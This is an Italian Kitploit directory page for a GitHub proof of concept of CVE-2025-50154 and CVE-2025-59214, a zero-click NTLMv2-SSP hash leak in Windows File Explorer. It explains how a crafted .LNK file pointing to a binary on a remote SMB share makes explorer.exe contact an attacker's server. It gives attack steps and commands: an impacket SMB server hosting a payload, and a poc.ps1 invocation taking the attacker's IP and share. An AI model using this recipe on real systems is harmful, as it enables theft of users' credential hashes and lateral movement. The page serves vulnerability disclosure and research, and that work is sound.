Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-50154 — POC per CVE-2025-50154 e CVE-2025-59214, vulnerabilità zero day in Esplora file di Windows che divulgano NTLMv2-SSP senza interazione dell'utente. È un bypass della patch di sicurezza CVE-2025-24054. | Kitploit
Strumenti/GitHubGitHub/rubenformation/cve-2025-50154
Analisi delle VulnerabilitàExploitMovimento LateraleApprendimento e Formazione
GitHubrubenformation/cve-2025-50154

CVE-2025-50154

POC per CVE-2025-50154 e CVE-2025-59214, vulnerabilità zero day in Esplora file di Windows che divulgano NTLMv2-SSP senza interazione dell'utente. È un bypass della patch di sicurezza CVE-2025-24054.

Vedi Repository
Sito web
55155010 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-50154, CVE-2025-59214

Divulgazione di hash NTLMv2-SSP Zero Click in Windows File Explorer

Di Ruben Enkaoua e Cymulate

Primo Blog: Zero Click, Un NTLM: Bypass della Patch di Sicurezza Microsoft (CVE-2025-50154)

Secondo Blog: Patchato Due Volte, Ancora Bypassato: Nuova Perdita NTLM (Bypass della Patch CVE-2025-50154)

Descrizione


Mentre Microsoft ha rilasciato un aggiornamento di sicurezza per una vulnerabilità di divulgazione di hash NTLM basata sulle icone, ho scoperto un bypass che consente comunque a un attaccante di recuperare hash NTLMv2-SSP senza interazione da parte dell'utente.

La vulnerabilità originale, recentemente patchata, era una divulgazione di hash NTLM a zero click attivata quando explorer.exe renderizzava l'icona di un file .LNK la cui icona era ospitata su un server SMB remoto.
Dopo la patch, explorer.exe non carica più le icone da percorsi SMB remoti, impedendo la divulgazione automatica degli hash NTLM.

Aggiornamento: la patch per CVE-2025-50154 non ha funzionato affatto. L'abbiamo segnalato e alla vulnerabilità è stato assegnato un nuovo CVE: CVE-2025-59214. Il POC è valido per entrambi i CVE.

Creando un file .LNK con:

Avvia un server responder sul tuo server Crea un LNK malintenzionato con PowerShell, su una macchina diversa, e poi rilascialo alla vittima (download dannoso, upload SMB...) Il processo explorer.exe renderizzerà l'icona scaricando automaticamente il file, cercando le intestazioni RT_ICON e RT_GROUP_ICON nella sezione .rsrc Questo codice è solo a scopo educativo e di ricerca. L'autore non si assume alcuna responsabilità per un uso improprio di questo codice.
  • Icona predefinita da shell32.dll
  • Percorso di destinazione che punta a un file binario ospitato su SMB remoto

  • Il processo explorer.exe recupererà comunque il file remoto per estrarre l'icona PE dalle sue risorse RT_GROUP_ICON e RT_ICON.

    DA-NTLMv2-SSP-leak

    Passaggi




    root@kitploit:~
    # put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
    impacket-smbserver share . -smb2support
    



    root@kitploit:~
    # Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
    .\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"
    



    Note



    Scarica lo strumento